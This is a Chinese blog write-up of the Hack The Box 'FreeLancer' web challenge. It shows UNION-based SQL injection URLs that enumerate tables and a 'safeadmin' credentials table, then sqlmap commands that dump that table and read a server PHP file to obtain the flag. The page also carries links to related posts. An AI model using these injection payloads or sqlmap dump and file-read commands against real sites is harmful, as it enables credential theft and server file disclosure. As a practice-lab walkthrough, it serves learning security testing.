hack the box[HTB]web题之FreeLancer

最新推荐文章于 2024-06-16 00:31:22 发布
最新推荐文章于 2024-06-16 00:31:22 发布
阅读量2.9k 收藏 2
点赞数
分类专栏: hackthebox 文章标签: 安全 docker web web安全 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39682037/article/details/105764414
版权

FreeLancer

题目描述:

Can you test how secure my website is? Prove me wrong and capture the flag!

流程

题目描述好像并没有给什么信息,直接进入网站看看吧
在这里插入图片描述
在下方找到了输入框,感觉可以注入
在这里插入图片描述
尝试一下:http://docker.hackthebox.eu:30643?id=1
在这里插入图片描述
尴尬,思路好像错了,在F12看下页面信息,好像发现了新大陆
在这里插入图片描述
登陆http://docker.hackthebox.eu:30643/portfolio.php看下,
GET方式的请求,直接注入吧
在这里插入图片描述

http://docker.hackthebox.eu:30643/portfolio.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

数据库内数据表就出来,两张表“portfolio”和"safeadmin",“safeadmin”==安全管理员???
在这里插入图片描述
看下“safeadmin”表的列名

http://docker.hackthebox.eu:30643/portfolio.php?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='safeadmin'

用户名,密码???这不就是我要的数据了么
在这里插入图片描述
上sqlmap脱裤了

gohb@gohb:~$ sqlmap -u http://docker.hackthebox.eu:30643/portfolio.php?id=1 -T safeadmin --dump

爆出了username和password,这个密码好像是加密过的。这个页面也没有输入框,咋整???
对不起,小编太菜了,只能到这种程度
这里小编忘记截图了,就是用文件扫描工具发现这个网站还有个/administrat/panel.php
继续上sqlmap

gohb@gohb:~$ sqlmap -u http://docker.hackthebox.eu:30643/portfolio.php?id=1 --file-read=/var/www/html/administrat/panel.php

在这里插入图片描述
文件被保存在自己的/home/gohb/.sqlmap/output/docker.hackthebox.eu/files/_var_www_html_administrat_panel.php,查看一下

gohb@gohb:~$ cat /home/gohb/.sqlmap/output/docker.hackthebox.eu/files/_var_www_html_administrat_panel.php

在这里插入图片描述
成功拿到flag。

qq_39682037
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB Freelancer
qq_58869808的博客
06-18 252
AD域
[HackTheBox]WEB
baguangman5501的博客
09-28 942
0x01 [50 Points] I know Mag1k 问描述: Can you get to the profile page of the admin? 访问分配的地址,是一个带注册的登入页面: 尝试常规注入,无效 来到注册页面注册,再退出,在使用已有的用户名登入会发现有一个用户名枚举的漏洞 这时的一个思路就是先通过暴力破解,枚举出管理员的用户名,然后结合二次注入注册一个类...
Hack The Box-Freelancer
m0_52742680的博客
06-04 2802
HackTheBox S5赛季靶场第七篇
HTB(hack the box) FreeLancer
weixin_44215027的博客
12-21 3391
HTB(hack the box) FreeLancer 这是一道30points的web。 提示: 你能测试我的网站有多安全吗?证明我错了,拿到flag! 进入网站: 继续往下浏览: 看到了这个,难道是xss?构造后send,提示: 看来不是xss,只能继续寻找。 然后我看到了: 一个长期存在的事实是,当读者在看一个页面的布局时,他们会被可读的内容分散注意力。 会不会在源码中? 查看...
htb_Freelancer
最新发布
weixin_62621015的博客
06-16 958
hack the box linux
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标表明这是一个与网络安全相关的资源库,特别是关于HackTheBoxHTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
hackthebox:HTB 机器和 InfoSec 社区的笔记
08-04
黑盒子 HTB机注意事项将定期更新,旨在解开所有可能的方式并准备考试还有更多待更新创建和维护: cyberwr3nch内容向无国界医生说不!这个不断地从5月3日更新RD 2020感谢造访菜鸟cyberwr3nch :wrench: TCSC Learn and...
vagrant-htbHackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox:只是我在做HackTheBox时的个人记录
04-03
哈克盒子按HTB难度等级和顺序排序机器简单 :端口445 Netbios Samba用户名映射脚本命令执行:MS08_067 NetAPI远程执行代码漏洞:通过FTP上传的ASPX反向Shell(IIS) :端口443 VTigerCRM(Elastix)本地文件包含LFI...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois ...
Seven:适用于Hack The Box团队的Discord机器人
05-13
七是使用和构建的半智能AI聊天,其目的是使Discord渠道中的Hack The Boxhackthebox.eu/)成就数据可访问和方便。 :mechanical_arm: 能力 七个可以提供有关以下信息: 她/她的功能(尝试寻求help , what can you...
HTB打靶日记:BroScience
01-10
在本文中,我们将深入探讨一个名为“BroScience”的HackTheBox靶场机器的渗透测试过程。这个场景主要涉及Web安全、Linux系统以及多种攻击技术。首先,我们从信息收集开始,使用Nmap对目标IP(10.129.125.159)进行...
HackTheBot:适用于Hack The Box成员的Python Discord Bot
05-22
将您的Hack The Box帐户与Discord服务器同步 检索有关框的信息(包含矩阵) 检索有关Hack The Box成员的信息 在Ippsec视频中搜索项目 检索上一个发布的盒子上的信息 查看Discord服务器成员的排行榜 列出活动框 ...
hack the box[HTB]web之ezpz
qq_39682037的博客
04-27 2162
未定义变量,那么自然就是obj 手工一个个转码成base64太麻烦了,上脚本吧 没问,只需要更改payload即可。 import requests import base64 from bs4 import BeautifulSoup def injection(payload): params = { "obj": base64.b64encode(pa...
hack the box (web)
m0_38094687的博客
04-08 5405
接下来是2道web,来自hack the box。这个网站还真是厉害啊,邀请码要靠自己破解网页的一个小trick。话不多说看。 - Cartographer (30) - HDC (30) Cartographer sql注入大水 使用username='='&password='='的方式绕过 访问一下info=flag即可得到 HDC 这...
Hack the Box——FreeLancer(sql) wp
maple's的博客
01-22 432
0x00前言 忙着学习的我,继续肝下一 提示: Can you test how secure my website is? Prove me wrong and capture the flag!(您可以测试我的网站的安全性吗?证明我错了,并抓住了旗子!) 0x01访问网站 http://167.99.88.216:32583/ 首先找攻击点 0x02 攻击点 打开源码从注释中找到攻击点 <!-- <a href="portfolio.php?id=1"&gt
hackthebox
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值